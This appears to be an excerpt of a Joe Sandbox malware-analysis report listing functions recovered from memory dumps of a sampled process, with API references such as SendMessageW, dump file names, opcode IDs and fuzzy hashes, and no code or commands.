                                                        Function 00B85C48 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,?,?,?), ref: 00B85CA5
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 592d6bc84c2dc7c5efb0673fc0aba63dec7e855a5bc0a6084f1327ba1b464909
                                                        • Instruction ID: 4a64beec7a799907da075bbba9a0428b89cce9e95fa2aa5933384cb2ef8bc9a4
                                                        • Opcode Fuzzy Hash: 592d6bc84c2dc7c5efb0673fc0aba63dec7e855a5bc0a6084f1327ba1b464909
                                                        • Instruction Fuzzy Hash: 28110AB68007499FDB10CF9AC445BEEBBF8EB48324F148459D554A3640D374A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B819AA Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,?,?,?,?,?,?,?,00B81999,?,?,00000000), ref: 00B81A0D
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 267a9f7c97ed5863c6b47ef251d870a8929c850737eb18ef33a80b06c7c0b7cd
                                                        • Instruction ID: 8ad212509c1eb5921c6efdcf7f364d57b1fa912cd8cf9872d887e6b1e1f6e3f2
                                                        • Opcode Fuzzy Hash: 267a9f7c97ed5863c6b47ef251d870a8929c850737eb18ef33a80b06c7c0b7cd
                                                        • Instruction Fuzzy Hash: 7511D6B68006499FDB10DF99D485BDEFBF8EB49324F148459D558A7200C375A944CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B80A34 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,?,?,?,?,?,?,?,00B81999,?,?,00000000), ref: 00B81A0D
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.816446536.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_b80000_systems.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: de414ee2f71f16b86135184b15ad8560ec01b17d59b4c3bb842f77ea5bd8cb85
                                                        • Instruction ID: a9e0bfb769a975753c3d040078cf18db2f61642c2b291e20f95870503e4c886f
                                                        • Opcode Fuzzy Hash: de414ee2f71f16b86135184b15ad8560ec01b17d59b4c3bb842f77ea5bd8cb85
                                                        • Instruction Fuzzy Hash: B71103B68003499FDB10DF9AC484BEEFBF8EB48324F148859E924B7200C374A945CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05C70501 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.823371598.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_5c70000_systems.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 525ae82e0aba1057177c63b14f09f7d428805e75c6afc5c5b482119e87600be0
                                                        • Instruction ID: 50b52a68ed8e0b31aeada6cba7e68f4b15e23bd50393677ce2915fb6427dfdfa
                                                        • Opcode Fuzzy Hash: 525ae82e0aba1057177c63b14f09f7d428805e75c6afc5c5b482119e87600be0
                                                        • Instruction Fuzzy Hash: 5CE06DB1C40209DFCB80EF79C9056AEBBF0BF08300F1289A9D418E3611E7748B059F55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05C70558 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.823371598.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_5c70000_systems.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac345696d94c4495898b29b6408b2210b98e12d271589156601e3798cee93619
                                                        • Instruction ID: 264fa632f81f79d617a6176706cc15e60b9f9cb95eb058b5a0b0f6385cf1028c
                                                        • Opcode Fuzzy Hash: ac345696d94c4495898b29b6408b2210b98e12d271589156601e3798cee93619
                                                        • Instruction Fuzzy Hash: 18E0BFB1C1430AAFDB90EFB9880979FBBF4AF04204F614D75C415F2640E77492069FA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05C70510 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.823371598.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_5c70000_systems.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b55f969065b08f9afcde5c842eea369fe4f44bfe55adcdfe72881177940a92d4
                                                        • Instruction ID: 460e118b257ef5b8feae00981069f8f4e93e2942de24bbfe855a56948588270d
                                                        • Opcode Fuzzy Hash: b55f969065b08f9afcde5c842eea369fe4f44bfe55adcdfe72881177940a92d4
                                                        • Instruction Fuzzy Hash: F4E0BFB0D40209DFD780DF79C50969EBBF5BF08300F11C965D019E7211E77496049F95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05C70568 Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.823371598.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_5c70000_systems.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f84cb0ba74a376884b6b90697ca020435b97dc74fd054f5200be727d88ee2f51
                                                        • Instruction ID: 6a555f0ff735405c827603ab933e77867fa674549e667393cada8a0e7686f937
                                                        • Opcode Fuzzy Hash: f84cb0ba74a376884b6b90697ca020435b97dc74fd054f5200be727d88ee2f51
                                                        • Instruction Fuzzy Hash: BED042B0D5430EEEDB90EFA9850979FBFF4AB08200F504D6AC015E6641E7B446049F95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%